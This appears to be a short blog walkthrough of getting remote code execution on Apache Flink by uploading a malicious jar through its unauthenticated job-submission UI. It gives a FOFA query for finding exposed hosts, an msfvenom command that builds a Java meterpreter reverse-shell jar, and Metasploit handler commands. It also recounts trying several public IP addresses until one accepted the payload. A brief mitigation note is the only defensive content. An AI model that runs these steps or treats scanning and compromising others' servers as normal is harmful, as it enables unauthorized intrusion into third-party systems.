Apache-Flink RCE Reproduction

This article was originally written in both Chinese and English with identical content.

Background

On Exploit DB I saw an entry for arbitrary jar upload in Apache Flink. It lists the affected range as <= 1.9.1, which was the latest release at the time of the entry, but in my own test the same technique also worked on version 1.12.1. That is expected: the "vulnerability" is the web UI's job-submission feature itself. Any jar uploaded through it has its main class executed inside the JobManager JVM, as the user Flink runs as, and a default install puts no authentication in front of the REST port. Later releases therefore behave the same way unless submission is turned off (web.submit.enable: false in flink-conf.yaml) or port 8081 is kept off untrusted networks.

Reproduction

The reproduction is straightforward: upload a malicious jar as a job and have it connect back with a reverse shell to a server you control.

First I used FOFA to find hosts on the public Internet that run Apache Flink; the web UI and REST API listen on port 8081 by default. The search syntax is:

app="Apache-Flink"

Many of the exposed Flink instances do not have jar upload enabled, and on some the upload function is misconfigured so the upload fails. After trying about 4 or 5 IPs I finally found one that was set up correctly.

First, generate a jar payload with msfvenom (replace yourIP and port with the address and port your handler will listen on):

msfvenom -p java/meterpreter/reverse_tcp LHOST=yourIP LPORT=port -f jar > testone.jar

In the Flink web UI, click Submit New Job, then Add New, and upload the generated jar file.

Before clicking Submit, start a listener for the reverse shell on your server. The handler's payload must match the one given to msfvenom, otherwise the stager is served the wrong second stage:

use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost yourIP
set lport port
run

Click Submit: Flink runs the jar's main class on the JobManager and the handler receives the session.
